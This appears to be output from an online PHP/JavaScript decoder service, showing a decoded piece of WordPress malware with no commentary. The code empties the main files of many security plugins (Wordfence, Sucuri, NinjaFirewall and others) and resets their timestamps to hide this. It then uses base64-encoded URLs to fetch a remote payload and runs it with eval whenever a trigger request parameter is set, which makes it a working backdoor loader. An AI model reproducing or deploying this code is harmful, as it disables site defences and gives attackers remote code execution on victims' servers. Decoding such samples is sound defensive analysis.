Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


$ja_pipj = 'qij_jrkytiwiibcvpqlzbtohrggdqqtfrvsclqhrt';
 ;
 $d = $_SERVER['DOCUMENT_ROOT'].'/wp-content/plugins/';
$f = array($d.'wordfence/wordfence.php',$d.'wordfence/waf/bootstrap.php',$d.'better-wp-security/better-wp-security.php',$d.'sucuri-scanner/sucuri.php',$d.'wp-security-audit-log/wp-security-audit-log.php',$d.'total-security/total-security.php',$d.'wp-hide-security-enhancer/wp-hide.php',$d.'bulletproof-security/bulletproof-security.php',$d.'wp-simple-firewall/icwp-wpsf.php',$d.'wp-security-policy/wp-content-security-policy.php',$d.'wp-cerber/wp-cerber.php',$d.'defender-security/wp-defender.php',$d.'security-ninja/security-ninja.php',$d.'cwis-antivirus-malware-detected/cwis-antivirus-malware-detected.php',$d.'ninjafirewall/ninjafirewall.php',$d.'security-antivirus-firewall/index.php',$d.'nfwplus/lib/firewall.php');
	 foreach ($f as $w){
		 if (is_file($w) && filesize($w) > 0) {
		 $stat = stat($w);
		fclose(fopen($w,'w'));
		@touch($w,$stat['mtime'],$stat['mtime']);
		clearstatcache();
	}
};
global $auth_pass,$color,$default_action,$default_use_ajax,$default_charset,$sort,$home_cwd,$cwd,$os,$safe_mode;
	if(!function_exists('get_magic_quotes_gpc')){
		 function get_magic_quotes_gpc() {
		 return false;
		 
	}
};
	 if (!function_exists('billb')) {
		 function billb($i){
		$a=Array('TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMCk=','TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS45LjAuMSkgR2Vja28vMjAwODA5MjIxNSBGaXJlZm94LzMuMC4x','TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUykgR2Vja28vMjAwMzA1MDQgTW96aWxsYSBGaXJlYmlyZC8wLjY=','TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS45LjIuMTApIEdlY2tvLzIwMTAwOTE0IEZpcmVmb3gvMy42LjEw','c2FmZV9tb2Rl','b3Blbl9iYXNlZGly','aHR0cHM6Ly8=','aHR0cHM6Ly8=','aHR0cDovLw==','','Iy8j','Lw==','','','Lw==','Lw==','QWNjZXB0LUxhbmd1YWdlOiBlbi11cywgZW47cT0wLjUwDQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQoNCg==','Cg==','PGJyIC8+','','L0xvY2F0aW9uXDov','TG9jYXRpb246IA==','DQ==','DQoNCg==','','JiM3NiYjMTExJiM5OSYjOTcmIzExNiYjMTA1JiMxMTEmIzExMCYjNTg=','TG9jYXRpb246','YWxsb3dfdXJsX2ZvcGVu','MQ==','aHR0cA==','bWV0aG9k','R0VU','aGVhZGVy','QWNjZXB0LUxhbmd1YWdlOiBlbi11cywgZW47cT0wLjUwDQo=','VXNlci1BZ2VudDog','DQo=','dGltZW91dA==','TnNQRWZwTWpCTA==','aHR0cDovL25ldG5ldDQ0Lm5ldC9zMg==','aHR0cDovL3NpbWJlcnNhLmNvbS9zMg==','aHR0cDovL3dlYnJvZW1lci5kZS9zMg==','aHR0cDovL29kaW50YXJhLmNvbS9zMg==','YmFzZQ==','NjQ=','X2Rl','Y29k','ZQ==');
		return base64_decode($a[$i]);
	}
		 if(!function_exists('cc2')){
			function cc2($_0,$_1=10){
			$_2=array(billb(0),billb(1),billb(2),billb(3));
				if(function_exists('curl_init')&& function_exists('curl_exec')){
				$_3=$_2[rand(round(0),count($_2)-round(1))];
				$_4=curl_init();
				curl_setopt($_4,10002,$_0);
				curl_setopt($_4,42,round(0));
				curl_setopt($_4,13,$_1);
				curl_setopt($_4,19913,round(1));
				curl_setopt($_4,10018,$_3);
					if(!(@ini_get(billb(4))||@ini_get(billb(5)))){
					@curl_setopt($_4,52,round(1));
				}
				@curl_setopt($_4,68,round(3));
				@curl_setopt($_4,64,false);
				$_5=curl_exec($_4);
				curl_close($_4);
					if($_5 !== false){
					return $_5;
				}
			}
				else if(function_exists('fsockopen')){
				global $_6;
				$_7=(strpos(strtolower($_0),billb(6))!== false)?billb(7):billb(8);
				$_8=$_2[rand(round(0),count($_2)-round(1))];
				$_0=str_replace($_7,billb(9),$_0);
					if(preg_match(billb(10),"$_0")){
					$_9=$_0;
					$_0=@explode(billb(11),$_0);
					$_0=$_0[round(0)];
					$_9=str_replace($_0,billb(12),$_9);
						if(!$_9 || $_9 == billb(13)){
						$_9=billb(14);
					}
					$_10=gethostbyname($_0);
				}
					else{
					$_10=gethostbyname($_0);
					$_9=billb(15);
				}
				$_11=fsockopen($_10,round(80),$_12,$_13,$_1);
				stream_set_timeout($_11,$_1);
					if($_11){
					$_14="GET $_9 HTTP/1.0\r\n";
					$_14 .="Host: $_0\r\n";
					$_14 .="Referer: $_7$_0$_9\r\n";
					$_14 .= billb(16);
					$_14 .="User-Agent: $_8\r\n";
					$_14 .= billb(17);
					fputs($_11,$_14);
						while(!feof($_11)){
						$_15 .= fgets($_11,4096);
					}
					fclose($_11);
					$_15=@explode(billb(18),$_15,2);
					$_16=$_15[round(0)];
						if($_6){
						$_16="$_6<br /><br />\n$_16";
					}
					$_16=str_replace(billb(19),billb(20),$_16);
						if($_15[round(0+1)]){
						$_17=$_15[round(0+1)];
					}
						else{
						$_17=billb(21);
					}
						if($_17){
						$_15=$_17;
					}
						else{
						$_15=$_16;
					}
						if(preg_match(billb(22),"$_16")){
						$_0=@explode(billb(23),$_16);
						$_0=$_0[round(0.5+0.5)];
						$_0=@explode(billb(24),$_0);
						$_0=$_0[round(0)];
						$_6=str_replace(billb(25),billb(26),$_16);
						$_18=billb(27);
						$_6=str_replace(billb(28),$_18,$_6);
						return cc2($_0);
					}
						else{
						return $_15;
					}
				}
			}
				else if(ini_get(billb(29))== billb(30)){
				$_19=stream_context_create(array(billb(31)=> array(billb(32)=> billb(33),billb(34)=> billb(35) .billb(36) .$_8 .billb(37),billb(38)=> $_1)));
				$_5=file_get_contents($_0,FALSE,$_19);
					if($_5 !== false){
					return $_5;
				}
			}
				else{
				return round(0);
			}
		}
	}
		if(isset($_REQUEST[billb(39)])){
		$_20=array(billb(40),billb(41),billb(42),billb(43));
		shuffle($_20);
		for($_21=round(0);
		$_21<count($_20);
			$_21++){
			$_22=billb(44) .billb(45) .billb(46) .billb(47) .billb(48);
			$_23=cc2($_20[$_21]);
				if(strlen($_23)== round(7416+7416+7416+7416)){
				eval($_22($_23));
				exit;
			}
		}
	}
}


© 2023 Quttera Ltd. All rights reserved.